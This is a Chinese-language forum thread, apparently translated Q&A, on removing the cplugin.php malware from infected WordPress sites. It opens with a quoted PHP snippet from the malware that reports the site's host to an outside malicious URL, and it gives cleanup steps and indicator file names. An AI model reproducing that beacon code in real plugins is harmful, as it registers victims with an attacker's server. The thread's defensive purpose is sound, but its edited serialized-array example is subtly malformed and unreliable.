if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}

这似乎是某种全球性攻击。在plugins文件夹中有一个文件cplugin.php，它会导致站点中断。删除文件没有用，因为它会再次出现。它还会感染多网站服务器上的所有其他站点。幸运的是，在工作了几个小时后，他们已经找到解决办法。请仔细阅读以下内容以修复您的网站：

1. 备份数据库和文件

2. 编辑您的wp_options表，找到属性active_plugins并进行编辑，您将看到它具有cplugin.php的插件条目。我们必须删除它。您的初始数据将如下所示：

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

对此进行编辑以删除cplugin.php条目，从i到下一个;，然后将其删除。 （确保您备份了数据库，以防万一您犯了一些错误）。没有cplugin.php的新条目将如下所示：

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

1. 对于名为site_transient_update_plugins的wp_option表中的字段，类似地执行此步骤

之前：O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....

之后：O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....

1. 更新字段后，导航回到主插件文件夹/wp-content/plugins并删除文件cplugin.php

2. 登录到Wordpress仪表板并重新激活所有插件

Voila，您已修复您的网站。

我认为这样做的技术原因是该恶意软件将其自身注册为wordpress插件，该插件在删除后会自动替换文件。幸运的是，该恶意软件的代码编写不正确，因此，如果不运行它，通常会抛出500 error。但是无论如何，我建议立即删除它，以防更新。

编辑： 根据此topic上的wordpress论坛主题，对于某些用户来说，简单地重命名文件也可以使网站正常工作，这可能是由于wordpress中重命名文件会停用插件，从而导致网站开始工作。但是无论如何我都不会重命名和存储受感染的文件，因此在获得对该网站的访问权限后，至少建议第一种解决方案。

,

这不是攻击，而是您自己下载并安装的无效插件或主题中包含的恶意软件。它是WP-VCD的更新版本-WordFence在WP-VCD: The Malware You Installed On Your Own Site中有一份包含所有详细信息的白皮书，也许我们应该将其称为“ WP-VCD Reloaded”：）

妥协指标是ccode.php中名为cplugin.php，helad.php，mplugin.php和admin_ips.txt（和wp-content/plugins）的插件文件和插件/主题，文件夹中有文件class.plugin-modules.php或class.theme-modules.php。

清理

1. 在class.plugin-modules.php或class.theme-modules.php中找到带有恶意软件的插件或主题，然后删除该插件或主题（如果需要，请从官方来源购买）。
2. 删除恶意软件插件：ccode.php，cplugin.php，helad.php或mplugin.php。
3. 对同一托管帐户/服务器下的所有站点重复此操作。

安装过程似乎确实触及wp-includes/functions.php，但它只是尝试删除恶意软件，因此这可能是从先前恶意软件版本进行某些升级的一部分。

,

在我们网站上的数据库中没有任何条目，但是调用代码已添加到wp-includes文件夹中的functions.php的底部。删除有问题的电话，站点立即弹出。 ：）

,

在名为 cplugin.php 和 helad.php 的wp-content文件夹文件中，可以修改此修复程序。立即将其删除，因为它会迁移到服务器上的所有多个网站，并且具有击中恶意软件URL的代码以下载其他文件。

,

您使用主题或插件为空。

• 请到这里扫描主题：https://themecheck.info/
• 这是我的主题：https://themecheck.info/score/wordpress-theme-goto-shared-by-wptry-org.html
• 他们在多个目录中添加了class.theme-modules.php文件，并将代码添加至functions.php文件中